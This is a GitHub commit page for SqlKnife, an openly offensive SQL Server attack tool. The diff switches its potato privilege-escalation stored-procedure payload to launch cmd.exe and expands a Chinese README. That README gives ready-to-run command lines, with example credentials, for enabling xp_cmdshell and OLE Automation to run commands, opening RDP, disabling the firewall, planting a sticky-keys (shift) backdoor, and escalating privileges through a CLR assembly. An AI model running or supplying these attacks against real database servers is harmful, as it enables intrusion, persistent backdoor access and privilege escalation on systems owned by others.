Skip to content

Commit 6c0444d

Browse files
hl0reyhl0rey
committed
反斜线bug说明更新图片
2 parents 252ad16 + 022a67a commit 6c0444d

16 files changed

+79
-25
lines changed

PotatoInSQL/PotatoInSQL.sqlproj

+1-1
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@
1616
<ModelCollation>1033, CI</ModelCollation>
1717
<DefaultFileStructure>BySchemaAndSchemaType</DefaultFileStructure>
1818
<DeployToDatabase>True</DeployToDatabase>
19-
<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
19+
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
2020
<TargetLanguage>CS</TargetLanguage>
2121
<AppDesignerFolder>Properties</AppDesignerFolder>
2222
<SqlServerVerification>False</SqlServerVerification>

PotatoInSQL/Program.cs

+2-2
Original file line numberDiff line numberDiff line change
@@ -53,8 +53,8 @@ public static void OriginMain(string cmd)
5353

5454
string clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
5555
ushort port = 6666;
56-
//string program = @"c:\Windows\System32\cmd.exe";
57-
string program = @"sqlps.exe";
56+
string program = @"c:\Windows\System32\cmd.exe";
57+
//string program = @"sqlps.exe";
5858
string programArgs = null;
5959
ExecutionMethod executionMethod = ExecutionMethod.Auto;
6060
bool showHelp = false;

README.md

+62-6
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,11 @@
1-
# bSqlKnife
1+
# SqlKnife
22

33
适合在命令行中使用的轻巧的SQL Server数据库攻击工具。
44

5-
65
## 参数说明
76

7+
![](img/Snipaste_2021-08-03_10-43-27.png)
8+
89
```
910
<-H host> <-P port> <-u username> <-p password> <-D dbname> <--openrdp> <--shift> <--disfw> <--xpcmd> <--oacreate> <--dbup> <--fix> <--remove> <--3/--4>
1011
```
@@ -21,7 +22,7 @@
2122

2223
-c 要执行的命令
2324

24-
--openrdp 开启目标远程桌面
25+
--openrdp 开启目标远程桌面并读取当前远程桌面端口号
2526

2627
--shift 创建shfit后门
2728

@@ -45,14 +46,22 @@
4546

4647
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --fix
4748

49+
![](img/Snipaste_2021-08-03_10-46-08.png)
50+
51+
![Snipaste_2021-08-03_10-46-29](img/Snipaste_2021-08-03_10-46-29.png)
52+
4853
#### 执行命令
4954

5055
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd -c whoami
5156

57+
![Snipaste_2021-08-03_10-47-04](img/Snipaste_2021-08-03_10-47-04.png)
58+
5259
#### 禁用xp_cmdshell
5360

5461
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --remove
5562

63+
![Snipaste_2021-08-03_10-47-56](img/Snipaste_2021-08-03_10-47-56.png)
64+
5665

5766
### 使用Ole Automation Procedures执行命令
5867

@@ -62,27 +71,74 @@ SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --remove
6271

6372
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --oacreate --fix
6473

74+
![Snipaste_2021-08-03_10-55-46](img/Snipaste_2021-08-03_10-55-46.png)
75+
6576
#### 执行程序
6677

67-
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --oacreate -c calc.exe
78+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --oacreate -c calc.exe
79+
80+
![Snipaste_2021-08-03_10-55-46](img/Snipaste_2021-08-03_10-55-46.png)
81+
82+
![Snipaste_2021-08-03_10-56-34](img/Snipaste_2021-08-03_10-56-34.png)
6883

6984
### 开RDP,关防火墙加规则(开RDP时自动加),装shift后门
7085

71-
基于注册表操作
86+
权限足够的前提下,基于注册表的操作
87+
88+
#### 开启RDP
89+
90+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --openrdp
91+
92+
![Snipaste_2021-08-03_11-36-43](img/Snipaste_2021-08-03_11-36-43.png)
93+
94+
![Snipaste_2021-08-03_11-36-57](img/Snipaste_2021-08-03_11-36-57.png)
95+
96+
#### 关防火墙
7297

98+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --disfw
7399

100+
(可能不好用,可能是因为注册表位置参考windows10的原因)
74101

102+
![Snipaste_2021-08-03_11-42-58](img/Snipaste_2021-08-03_11-42-58.png)
75103

104+
#### 装shift后门
105+
106+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --shift
107+
108+
![Snipaste_2021-08-03_11-45-54](img/Snipaste_2021-08-03_11-45-54.png)
109+
110+
![Snipaste_2021-08-03_11-29-11](img/Snipaste_2021-08-03_11-29-11.png)
76111

77112
### PotatoInSQL(--dbup)
78113
将土豆提权作为存储过程安装到数据库,然后调用。
79114

115+
#### 安装.net3.5版本的potatoinsql
116+
117+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --dbup --fix --3
118+
119+
![Snipaste_2021-08-03_11-17-47](img/Snipaste_2021-08-03_11-17-47.png)
120+
121+
![Snipaste_2021-08-03_11-18-02](img/Snipaste_2021-08-03_11-18-02.png)
122+
80123

81124

125+
#### 利用土豆执行命令
126+
127+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --dbup -c whoami
128+
129+
![Snipaste_2021-08-03_11-28-46](img/Snipaste_2021-08-03_11-28-46.png)
130+
131+
![Snipaste_2021-08-03_11-29-11](img/Snipaste_2021-08-03_11-29-11.png)
132+
82133
### 启用/还原配置功能
134+
135+
![Snipaste_2021-08-03_11-29-35](img/Snipaste_2021-08-03_11-29-35.png)
136+
83137
做完操作之后把配置和CLR程序集清理掉。
84138

85139
--fix参数和--remove参数只涉及--xpcmd、--oacreate、--clrcmd、--clrdexec、--dbup
86140

87141

88-
### 指定不同版本clr的payload
142+
### 指定不同版本clr的payload
143+
144+
--3/--4 如果不加这个参数,默认是.net4版本的payload

SqlKnife/MsSqlExploit.cpp

+12-13
Large diffs are not rendered by default.

img/Snipaste_2021-08-03_11-17-47.png

5.54 KB
Loading

img/Snipaste_2021-08-03_11-18-02.png

2.33 KB
Loading

img/Snipaste_2021-08-03_11-19-41.png

3.15 KB
Loading

img/Snipaste_2021-08-03_11-28-46.png

10.6 KB
Loading

img/Snipaste_2021-08-03_11-29-11.png

3.11 KB
Loading

img/Snipaste_2021-08-03_11-29-35.png

5.61 KB
Loading

img/Snipaste_2021-08-03_11-36-43.png

3.88 KB
Loading

img/Snipaste_2021-08-03_11-36-57.png

3.57 KB
Loading

img/Snipaste_2021-08-03_11-42-58.png

2.99 KB
Loading

img/Snipaste_2021-08-03_11-45-54.png

2.92 KB
Loading

img/Snipaste_2021-08-03_11-46-53.png

257 KB
Loading

sqltool.py

+2-3
Large diffs are not rendered by default.

0 commit comments

Comments
 (0)